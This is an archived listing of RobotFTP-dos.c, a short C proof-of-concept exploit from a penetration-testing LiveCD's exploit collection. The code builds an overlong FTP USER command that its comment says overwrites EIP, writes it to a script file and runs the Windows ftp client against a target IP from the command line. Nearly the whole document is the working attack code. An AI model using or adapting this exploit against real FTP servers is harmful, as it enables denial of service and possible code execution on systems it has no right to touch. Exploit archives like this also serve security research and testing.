home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / roboftp / RobotFTP-dos.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  1KB  |  47 lines
  1. /******************************
  2. this is example code for the vulnerability. It uses the windows ftp client to connect to a server
  3. ******************************/
  4. #include <stdio.h>
  5.  
  6. char buffer[2500];
  7. char cmd[50];
  8.  
  9. int main(int argc, char *argv[])
  10. {
  11.         FILE *evil;
  12.  
  13.         if(argv[1] == NULL)
  14.         {
  15.                 printf("Usage: %s [IP]\n\n",argv[0]);
  16.                 return 0;
  17.         }
  18.  
  19.         memset(buffer,0x41,47);
  20.         memcpy(buffer+47,"\r\n",2);
  21.         memcpy(buffer+49,"crash",5);
  22.         memcpy(buffer+54,"\r\n",2);
  23.         memcpy(buffer+56,"USER ",5);
  24.         memset(buffer+61,0x41,1989);
  25.         memset(buffer+61+1989,0x58,4);  // << overwrites the eip with XXXX
  26.         memcpy(buffer+65+1989,"\r\n",2);
  27.  
  28.         sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);
  29.  
  30.  
  31.         if((evil = fopen("ftp.txt", "a+")) != NULL)
  32.         {
  33.                 fputs(buffer, evil);
  34.                 fclose(evil);
  35.                 printf("- file written!\n");
  36.         }
  37.         else
  38.         {
  39.                 fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
  40.                 exit(1);
  41.         }
  42.         system(cmd);
  43.  
  44. }
  45. /*******************************/
  46.  
  47.